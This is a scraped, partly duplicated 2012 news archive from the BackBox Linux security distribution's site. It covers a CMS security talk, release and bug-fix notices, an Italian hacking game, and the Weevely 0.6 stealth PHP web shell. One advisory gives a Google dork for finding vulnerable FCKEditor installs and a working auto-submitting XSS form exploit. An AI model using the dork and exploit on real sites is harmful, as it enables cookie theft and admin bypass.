Raffaele Forte speaker all’evento organizzato a Roma il 2 Luglio da HTML.it.
Il founder del progetto BackBox Linux interverrà in materia di Sicurezza Applicativa con un talk dal titolo “CMS, Analisi automatica delle vulnerabilità”.
Un CMS vulnerabile può permettere ad un attaccante di prendere il pieno controllo del sito (Blog, Forum, e-commerce, etc.), fornendo la possibilità di modificare i contenuti, creare e rimuovere utenti e nel caso peggiore ottenere persino il controllo del server su cui è installato. Sempre più aziende ed enti istituzionali adottano questi strumenti, ma quali sono i vantaggi e che livello di sicurezza garantiscono gli attuali CMS? Affronteremo queste tematiche servendoci di metodologie e strumenti automatici di verifica delle vulnerabilità.
Maggiori informazioni le trovate sul sito ufficiale dell’evento.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2012-06-22 18:50:592018-10-02 21:29:55Talk @ HTML.it Release Party
Emilio Pinna has recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. In 2009 has been rewrited and fixed with new name CKEditor, but old version is still popular as stand-alone application as WordPress/Joomla/Drupal extensions and embedded as editor in of web applications.
The bugged software was spreaded for more than six years and actually Google counts still more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be:
As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session that visit resulting in a cookie stealing and bypass of admin access controls. Exploit is CRSF-like due to POST vulnerable parameter. Form exploit:
After release of BackBox 2.05 we have noticed that the GRUB being corrupted on ISO image of 64 bit version. We would like to inform everyone that the error has been fixed and the new ISO image being uplodaed on our official mirrors. In order to avoid any sort of problem, we would like to invite all users, to download the new ISO image. We would like to also thanks to the community of BackBox users for notification of this error.
Enjoy your BackBox!
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2012-04-29 02:08:042018-10-02 21:31:40GRUB error being fixed on BackBox 64 bit version
The BackBox team is proud to announce the release 2.05 of BackBox Linux. The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32bit & 64bit) can be downloaded from the following location: https://www.backbox.org/download
Anche questo anno il team di BackBox Linux scende in campo a sostegno di una delle iniziative piu interessanti nel panorama hacker italiano. Il CAT (Cracca Al Tesoro) è un “Hacking Game” il cui scopo è violare vari sistemi configurati per l’occasione, la squadra che otterrà il punteggio più alto verrà proclamata vincitrice.
Il nostro team, in accordo con gli organizzatori dell’evento, ha deciso di sostenere questa iniziativa il cui fine è sensibilizzare gli utenti su tematiche relative la sicurezza informatica e la protezione dei dati personali. Per l’occasione i partecipanti equipaggiati con BackBox, collegandosi al nostro canale IRC ufficiale avranno a disposizione il supporto dell’intera community
Il Cracca Al Tesoro 2012 si svolgerà presso la Fiera di Genova il 12 maggio, le iscrizioni sono gratuite, per maggiori informazioni wardriving.it
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2012-04-19 14:35:252018-10-02 21:33:4712 May, BackBox Linux @ CAT2012
The BackBox Team is proud to announce the release 0.6 of Weevely!
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and could be used like an hidden backdoor and as a useful telnet-like console replacement to manage web accounts, even if hosted in free hosting services. Just generate and upload the “server” PHP code on the target web server, and run Weevely client locally to transmit shell commands.
What’s new
Backdoor communications are hidden in Cookie requests
Communications are encoded using NIDS evasion techniques (any request is randomly obfuscated to bypass signature detection)
Backdoor PHP code is polymorphic to obfuscate functions commonly used in backdoors
Modular architecture have about 30 modules for every kind of maintain access/post exploit task
Modules implement different techniques to accomplish single tasks to mitigate disabled_functions, safe_mode and other PHP restrictions
Talk @ HTML.it Release Party
/in NewsRaffaele Forte speaker all’evento organizzato a Roma il 2 Luglio da HTML.it.
Il founder del progetto BackBox Linux interverrà in materia di Sicurezza Applicativa con un talk dal titolo “CMS, Analisi automatica delle vulnerabilità”.
Un CMS vulnerabile può permettere ad un attaccante di prendere il pieno controllo del sito (Blog, Forum, e-commerce, etc.), fornendo la possibilità di modificare i contenuti, creare e rimuovere utenti e nel caso peggiore ottenere persino il controllo del server su cui è installato. Sempre più aziende ed enti istituzionali adottano questi strumenti, ma quali sono i vantaggi e che livello di sicurezza garantiscono gli attuali CMS? Affronteremo queste tematiche servendoci di metodologie e strumenti automatici di verifica delle vulnerabilità.
Maggiori informazioni le trovate sul sito ufficiale dell’evento.
FCKEditor reflected XSS vulnerability
/in NewsEmilio Pinna has recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. In 2009 has been rewrited and fixed with new name CKEditor, but old version is still popular as stand-alone application as WordPress/Joomla/Drupal extensions and embedded as editor in of web applications.
The bugged software was spreaded for more than six years and actually Google counts still more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be:
inurl:fck_spellerpages/spellerpages/server-scripts/ -”The following variables”
The vulnerability
The reflected XSS is injected through ‘textinputs’ POST parameter array, printed without sanization in line 27:
echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";
As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session that visit resulting in a cookie stealing and bypass of admin access controls. Exploit is CRSF-like due to POST vulnerable parameter. Form exploit:
<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/ spellchecker.php" target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!"); </script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
Have fun!
GRUB error being fixed on BackBox 64 bit version
/in NewsAfter release of BackBox 2.05 we have noticed that the GRUB being corrupted on ISO image of 64 bit version. We would like to inform everyone that the error has been fixed and the new ISO image being uplodaed on our official mirrors. In order to avoid any sort of problem, we would like to invite all users, to download the new ISO image. We would like to also thanks to the community of BackBox users for notification of this error.
Enjoy your BackBox!
BackBox Linux 2.05 released!
/in ReleasesThe BackBox team is proud to announce the release 2.05 of BackBox Linux. The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32bit & 64bit) can be downloaded from the following location: https://www.backbox.org/download
What’s new
System requirements
12 May, BackBox Linux @ CAT2012
/in NewsAnche questo anno il team di BackBox Linux scende in campo a sostegno di una delle iniziative piu interessanti nel panorama hacker italiano. Il CAT (Cracca Al Tesoro) è un “Hacking Game” il cui scopo è violare vari sistemi configurati per l’occasione, la squadra che otterrà il punteggio più alto verrà proclamata vincitrice.
Il nostro team, in accordo con gli organizzatori dell’evento, ha deciso di sostenere questa iniziativa il cui fine è sensibilizzare gli utenti su tematiche relative la sicurezza informatica e la protezione dei dati personali. Per l’occasione i partecipanti equipaggiati con BackBox, collegandosi al nostro canale IRC ufficiale avranno a disposizione il supporto dell’intera community
Il Cracca Al Tesoro 2012 si svolgerà presso la Fiera di Genova il 12 maggio, le iscrizioni sono gratuite, per maggiori informazioni wardriving.it
Weevely 0.6 released!
/in NewsThe BackBox Team is proud to announce the release 0.6 of Weevely!
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and could be used like an hidden backdoor and as a useful telnet-like console replacement to manage web accounts, even if hosted in free hosting services. Just generate and upload the “server” PHP code on the target web server, and run Weevely client locally to transmit shell commands.
What’s new